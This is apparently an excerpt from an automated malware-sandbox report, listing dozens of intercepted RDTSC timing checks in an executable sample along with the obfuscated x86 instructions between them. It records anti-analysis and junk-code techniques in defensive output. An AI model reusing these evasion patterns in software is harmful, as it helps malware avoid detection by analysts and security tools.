Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10216CF second address: 102173F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F76E5036BB7h 0x00000008 jmp 00007F76E5036BB1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [eax] 0x00000011 jmp 00007F76E5036BB7h 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push eax 0x0000001b jnc 00007F76E5036BACh 0x00000021 pop eax 0x00000022 pop eax 0x00000023 movzx esi, bx 0x00000026 or esi, dword ptr [ebp+122D2D41h] 0x0000002c push 00000003h 0x0000002e xor dword ptr [ebp+122D2946h], edx 0x00000034 push 00000000h 0x00000036 movsx edx, si 0x00000039 push 00000003h 0x0000003b mov cl, ah 0x0000003d call 00007F76E5036BA9h 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 102173F second address: 1021745 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1021745 second address: 1021761 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5036BB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1021761 second address: 10217BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop eax 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007F76E5186DF8h 0x00000015 mov eax, dword ptr [eax] 0x00000017 ja 00007F76E5186DFCh 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 jmp 00007F76E5186DECh 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10217BC second address: 10217C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1021885 second address: 102188F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F76E5186DE6h 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 102193E second address: 1021946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 103FE1D second address: 103FE2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F76E5186DE6h 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1040AE7 second address: 1040AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1040AEB second address: 1040AEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 104160B second address: 104160F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 104160F second address: 1041621 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5186DEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1041621 second address: 1041627 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1041627 second address: 1041631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F76E5186DE6h 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 104191E second address: 1041922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1041922 second address: 1041945 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F76E5186DE6h 0x00000008 jmp 00007F76E5186DF9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1041AD4 second address: 1041AF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76E5036BB3h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1041AF0 second address: 1041AF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1044A57 second address: 1044A61 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F76E5036BA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1045061 second address: 1045091 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007F76E5186DEEh 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 jmp 00007F76E5186DF2h 0x00000019 pop ebx 0x0000001a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10487E6 second address: 10487EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10487EA second address: 10487EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10168F2 second address: 10168F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1049DDD second address: 1049E07 instructions: 0x00000000 rdtsc 0x00000002 je 00007F76E5186DF4h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jng 00007F76E5186DE6h 0x00000013 jbe 00007F76E5186DE6h 0x00000019 push esi 0x0000001a pop esi 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1049E07 second address: 1049E13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F76E5036BA6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 104D10F second address: 104D11F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 jng 00007F76E5186DE6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 104D11F second address: 104D127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 104D127 second address: 104D12D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 104D12D second address: 104D13E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 ja 00007F76E5036BB0h 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 104D287 second address: 104D29B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5186DEEh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 104D588 second address: 104D58E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 104EEAF second address: 104EEDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76E5186DEAh 0x00000009 popad 0x0000000a jbe 00007F76E5186DFCh 0x00000010 jmp 00007F76E5186DF0h 0x00000015 js 00007F76E5186DE6h 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 100C98E second address: 100C998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F76E5036BA6h 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1051D00 second address: 1051D04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1051D04 second address: 1051D0A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1051D0A second address: 1051D14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F76E5186DE6h 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 105236F second address: 1052379 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F76E5036BACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1052419 second address: 1052420 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 105294D second address: 1052952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1052AD6 second address: 1052ADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 105330A second address: 1053310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1053310 second address: 1053314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1053314 second address: 1053377 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F76E5036BA8h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 mov si, C81Ah 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ecx 0x0000002e call 00007F76E5036BA8h 0x00000033 pop ecx 0x00000034 mov dword ptr [esp+04h], ecx 0x00000038 add dword ptr [esp+04h], 00000018h 0x00000040 inc ecx 0x00000041 push ecx 0x00000042 ret 0x00000043 pop ecx 0x00000044 ret 0x00000045 mov edi, dword ptr [ebp+122D2C1Bh] 0x0000004b push 00000000h 0x0000004d clc 0x0000004e xchg eax, ebx 0x0000004f push edi 0x00000050 je 00007F76E5036BACh 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1053DD6 second address: 1053DDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1054CE9 second address: 1054CED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1054CED second address: 1054D55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5186DF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a ja 00007F76E5186DE6h 0x00000010 jmp 00007F76E5186DF0h 0x00000015 popad 0x00000016 popad 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007F76E5186DE8h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 00000019h 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 push 00000000h 0x00000036 mov di, 55C7h 0x0000003a mov esi, edx 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jnl 00007F76E5186DECh 0x00000045 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1054D55 second address: 1054D5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10561CA second address: 10561D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10561D0 second address: 10561D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10561D5 second address: 10561DA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1057794 second address: 10577A3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10577A3 second address: 10577A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10577A8 second address: 10577AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10577AD second address: 10577B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 105928E second address: 1059294 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1059870 second address: 105987A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F76E5186DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 105987A second address: 1059880 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1059880 second address: 1059884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1000D78 second address: 1000D7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1000D7C second address: 1000D97 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 popad 0x00000014 js 00007F76E5186DE6h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1000D97 second address: 1000D9C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 105E269 second address: 105E26F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 105E26F second address: 105E294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F76E5036BA6h 0x0000000e jmp 00007F76E5036BB7h 0x00000013 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 105E294 second address: 105E29E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F76E5186DE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 105E29E second address: 105E2AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jng 00007F76E5036BA6h 0x00000010 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 105E2AE second address: 105E2CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F76E5186DEAh 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007F76E5186DE6h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 105E2CB second address: 105E2E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5036BB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10027C1 second address: 10027DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5186DF2h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 10027DB second address: 1002812 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F76E5036BA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnp 00007F76E5036BAAh 0x00000013 pushad 0x00000014 jg 00007F76E5036BA6h 0x0000001a push edi 0x0000001b pop edi 0x0000001c jmp 00007F76E5036BB2h 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1002812 second address: 1002816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 105F822 second address: 105F88A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e jmp 00007F76E5036BAFh 0x00000013 popad 0x00000014 nop 0x00000015 sub dword ptr [ebp+12488575h], edx 0x0000001b mov dword ptr [ebp+122D2FCEh], ecx 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push edx 0x00000026 call 00007F76E5036BA8h 0x0000002b pop edx 0x0000002c mov dword ptr [esp+04h], edx 0x00000030 add dword ptr [esp+04h], 0000001Ch 0x00000038 inc edx 0x00000039 push edx 0x0000003a ret 0x0000003b pop edx 0x0000003c ret 0x0000003d mov di, cx 0x00000040 xor di, C0FEh 0x00000045 push 00000000h 0x00000047 mov edi, ecx 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e jnc 00007F76E5036BA6h 0x00000054 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 105F88A second address: 105F88E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 105F88E second address: 105F894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1063B96 second address: 1063BB8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F76E5186DECh 0x00000008 jns 00007F76E5186DE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 jng 00007F76E5186DECh 0x00000018 jbe 00007F76E5186DE6h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 pop eax 0x00000022 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1064C15 second address: 1064C1B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 1067287 second address: 106728B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	RDTSC instruction interceptor: First address: 106728B second address: 1067291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
